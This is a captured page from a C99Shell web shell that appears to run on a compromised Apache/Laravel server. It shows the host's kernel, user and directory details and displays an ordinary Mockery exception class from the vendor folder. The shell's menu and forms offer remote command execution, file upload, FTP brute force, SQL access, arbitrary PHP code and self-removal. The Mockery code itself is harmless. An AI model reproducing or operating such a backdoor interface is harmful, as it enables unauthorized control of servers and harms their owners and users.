!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/laravel-crm/vendor/mockery/mockery/library/Mockery/Exception/   drwxrwxrwx
Free 13.1 GB of 57.97 GB (22.59%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InvalidCountException.php (2.73 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Mockery (https://docs.mockery.io/)
 *
 * @copyright https://github.com/mockery/mockery/blob/HEAD/COPYRIGHT.md
 * @license https://github.com/mockery/mockery/blob/HEAD/LICENSE BSD 3-Clause License
 * @link https://github.com/mockery/mockery for the canonical source repository
 */

namespace Mockery\Exception;

use 
Mockery\CountValidator\Exception;
use 
Mockery\LegacyMockInterface;

use function 
in_array;

class 
InvalidCountException extends Exception
{
    
/**
     * @var int|null
     */
    
protected $actual null;

    
/**
     * @var int
     */
    
protected $expected 0;

    
/**
     * @var string
     */
    
protected $expectedComparative '<=';

    
/**
     * @var string|null
     */
    
protected $method null;

    
/**
     * @var LegacyMockInterface|null
     */
    
protected $mockObject null;

    
/**
     * @return int|null
     */
    
public function getActualCount()
    {
        return 
$this->actual;
    }

    
/**
     * @return int
     */
    
public function getExpectedCount()
    {
        return 
$this->expected;
    }

    
/**
     * @return string
     */
    
public function getExpectedCountComparative()
    {
        return 
$this->expectedComparative;
    }

    
/**
     * @return string|null
     */
    
public function getMethodName()
    {
        return 
$this->method;
    }

    
/**
     * @return LegacyMockInterface|null
     */
    
public function getMock()
    {
        return 
$this->mockObject;
    }

    
/**
     * @throws RuntimeException
     * @return string|null
     */
    
public function getMockName()
    {
        
$mock $this->getMock();

        if (
$mock === null) {
            return 
'';
        }

        return 
$mock->mockery_getName();
    }

    
/**
     * @param  int  $count
     * @return self
     */
    
public function setActualCount($count)
    {
        
$this->actual $count;
        return 
$this;
    }

    
/**
     * @param  int  $count
     * @return self
     */
    
public function setExpectedCount($count)
    {
        
$this->expected $count;
        return 
$this;
    }

    
/**
     * @param  string $comp
     * @return self
     */
    
public function setExpectedCountComparative($comp)
    {
        if (! 
in_array($comp, ['=''>''<''>=''<='], true)) {
            throw new 
RuntimeException('Illegal comparative for expected call counts set: ' $comp);
        }

        
$this->expectedComparative $comp;
        return 
$this;
    }

    
/**
     * @param  string $name
     * @return self
     */
    
public function setMethodName($name)
    {
        
$this->method $name;
        return 
$this;
    }

    
/**
     * @return self
     */
    
public function setMock(LegacyMockInterface $mock)
    {
        
$this->mockObject $mock;
        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0077 ]--